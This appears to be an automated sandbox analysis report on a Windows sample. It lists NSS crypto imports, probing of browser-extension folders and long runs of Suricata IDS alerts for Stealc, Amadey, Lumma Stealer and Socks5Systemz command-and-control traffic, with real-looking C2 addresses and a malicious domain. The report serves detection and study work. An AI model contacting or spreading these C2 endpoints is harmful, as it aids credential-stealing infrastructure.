Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C767C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C767C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C727D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C727D60

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Parser: No favicon

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Shine Encoder_is1

Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50055 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50060 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.182.141.63:443 -> 192.168.2.4:50370 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2070728009.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e708276138.exe, 00000013.00000003.2809369415.0000000008480000.00000004.00001000.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2955418011.0000000006352000.00000040.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2955938891.0000000008380000.00000004.00001000.00020000.00000000.sdmp, e708276138.exe, 00000015.00000002.3054578560.00000000062A2000.00000040.00000800.00020000.00000000.sdmp, 76f1524c8d.exe, 00000018.00000002.2873694128.0000000000602000.00000040.00000001.01000000.00000016.sdmp, 76f1524c8d.exe, 00000018.00000003.2737841216.00000000045F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2070728009.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe

Directory queried: number of queries: 3961

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 42MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49797 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49810
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49877 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.4:52934 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:49932 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49927 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:49940 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:49950 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:49961 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:49972 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49989 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:49983 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50002 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50005 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49990 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50009 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50027 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50015 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50032 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50044 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50049 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50048 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50055 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50056 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50057 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50059 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50060 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50062 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50064 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50063 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50067 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50074 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50080 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50087 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50101 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50107 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.4:55271 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50124 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50128 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50132 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50123 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50121 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50121 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50123 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50117 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50117 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50140 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50125 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50133 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50136 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50137 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50136 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50145 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50133 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50125 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50143 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50143 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50127 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50127 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50129 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50129 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50156 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50151 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50151 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50148 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50148 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50156 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50153 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50142 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50158 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50153 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50142 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50139 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50158 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50139 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50146 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50146 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50149 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2057397 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI) : 192.168.2.4:50154 -> 104.21.80.55:443
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50160 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50160 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.4:62100 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50162 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50162 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50166 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50168 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50166 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50168 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50172 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50172 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50176 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50176 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50180 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50180 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50175 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50175 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50171 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50169 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50171 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50169 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50182 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50190 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.4:58211 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50190 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50191 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50196 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50191 -> 185.208.158.202:80
